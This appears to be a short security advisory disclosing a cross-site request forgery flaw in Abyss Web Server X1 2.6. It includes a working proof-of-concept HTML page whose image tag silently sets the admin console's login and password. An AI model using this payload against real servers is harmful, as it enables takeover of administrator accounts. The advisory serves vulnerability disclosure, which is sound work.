Home
Consulting
Advisories
Software
Articles
Contact

Abyss Web Server X1 2.6 Cross-site Request Forgery

Legacy Advisories

Description

A cross-site request forgery vulnerability in Abyss Web Server X1 2.6 can be exploited to change the admin password.

Proof Of Concept

<html>
    <body>
        <img src="http://127.0.0.1:9999/console/credentials?%2fconsole%2fcredentials%2flogin=admin&%2fconsole%2fcredentials%2fpassword%2f%24pass1=Password1&%2fconsole%2fcredentials%2fpassword%2f%24pass2=Password1&%2fconsole%2fcredentials%2fbok=%c2%a0%c2%a0OK%c2%a0%c2%a0" />
    </body>
</html>


Copyright © 2018 AutoSec Tools LLC